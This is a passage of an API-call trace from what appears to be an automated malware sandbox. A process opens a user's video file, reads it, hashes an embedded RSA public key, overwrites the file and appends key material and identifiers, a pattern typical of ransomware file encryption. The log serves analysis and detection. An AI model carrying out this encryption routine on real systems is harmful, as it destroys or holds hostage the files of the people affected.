lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bc2750, ftCreationTime.dwHighDateTime=0x1d89d92, ftLastAccessTime.dwLowDateTime=0xd2384160, ftLastAccessTime.dwHighDateTime=0x1d8a592, ftLastWriteTime.dwLowDateTime=0xd2384160, ftLastWriteTime.dwHighDateTime=0x1d8a592, nFileSizeHigh=0x0, nFileSizeLow=0x11573, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M mFu P.mp4", cAlternateFileName="MMFUP~1.MP4")) returned 1 [0203.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.571] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0203.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.571] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\M mFu P.mp4") returned=".mp4" [0203.571] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\_qbp0nkGuotBuAqg\\M mFu P.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\_qbp0nkguotbuaqg\\m mfu p.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.572] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=71027) returned 1 [0203.572] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.574] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1154d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.574] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.577] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.577] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11573, lpOverlapped=0x0) returned 1 [0203.580] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.580] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.581] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.581] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0203.582] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0203.582] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0203.582] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0203.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0203.582] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0203.582] GetLastError () returned 0x0 [0203.582] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0203.582] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0203.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.583] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0203.583] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0203.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.583] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0203.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11570) returned 0x2ea99b0 [0203.584] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea2068 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37d0 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20b0 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea37e8 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3878 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0203.585] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0203.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0203.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0203.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3878 [0203.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3818 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0203.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0203.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0203.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0203.588] GetCurrentThreadId () returned 0x66c [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea3f00 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.589] GetCurrentThreadId () returned 0x66c [0203.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0203.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0203.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0203.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0203.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3878 [0203.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0203.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0203.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3830 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3890 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0203.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0203.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea38a8 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3818 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0203.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38a8 | out: hHeap=0x620000) returned 1 [0203.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0203.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0203.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0203.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0203.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0203.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0203.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0203.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0203.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0203.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0203.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0203.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0203.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0203.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0203.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3800 | out: hHeap=0x620000) returned 1 [0203.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0203.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0203.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0203.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea37e8 | out: hHeap=0x620000) returned 1 [0203.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea20b0 | out: hHeap=0x620000) returned 1 [0203.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0203.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0203.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0203.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0203.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0203.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0203.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0203.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0203.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0203.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0203.602] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x1156e, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x1156e, lpOverlapped=0x0) returned 1 [0203.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0203.603] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x11573, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.603] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0203.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0203.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0203.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0203.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0203.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0203.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.605] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0203.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0203.605] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.605] WriteFile (in: hFile=0x510, 